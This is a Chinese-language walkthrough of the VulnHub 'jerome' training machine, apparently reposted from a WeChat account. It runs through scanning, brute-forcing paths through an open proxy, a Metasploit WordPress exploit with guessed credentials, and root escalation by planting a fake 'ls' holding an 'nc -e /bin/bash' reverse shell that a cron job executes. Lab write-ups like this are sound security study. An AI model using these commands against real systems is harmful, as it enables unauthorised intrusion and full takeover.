本周实践的是vulnhub的jerome镜像,
下载地址,https://download.vulnhub.com/sp/jerome-v1.0.1.7z,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址是192.168.0.192,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.192,
发现靶机仅开了8080端口的http代理服务,
对代理服务进行路径暴破,
dirb http://127.0.0.1 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -p 192.168.0.192:8080,
获取到http://127.0.0.1/server-status,
给firefox浏览器上FoxyProxy插件,
浏览器访问http://127.0.0.1/server-status,
获取到靶机上还有1337端口的http服务,
对1337端口的http服务进行路径暴破,
dirb http://127.0.0.1:1337 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -p 192.168.0.192:8080,
获取到http://127.0.0.1:1337/wordpress,
对wordpress进行扫描,
wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.0.192:8080 -e u,获取到版本号信息和用户名,
在msf里搜漏洞利用方法,尝试第一个,
use exploit/multi/http/wp_crop_rce
set rhosts 127.0.0.1
set proxies http:192.168.0.192:8080
set username jerome
set password jerome
set targeturi /wordpress
set rport 1337
set ReverseAllowProxy true
set lhost 192.168.0.191
exploit
获取到msf的shell,转成普通shell,继续转成交互式shell,
查看定时任务,cat /etc/crontab,
继续查看定时任务中的脚本文件内容,/usr/share/simulate.sh,
看到在当前用户的目录下执行了ls,
进入当前用户的目录,cd /home/jerome,创建新的ls,
echo "nc -e /bin/bash 192.168.0.191 4455" >> ls,
修改权限,chmod 777 ls,
在kali攻击机上开启反弹shell监听,nc -lvp 4455,
等待一会儿,就获取到了反弹shell,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之jerome的实践
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论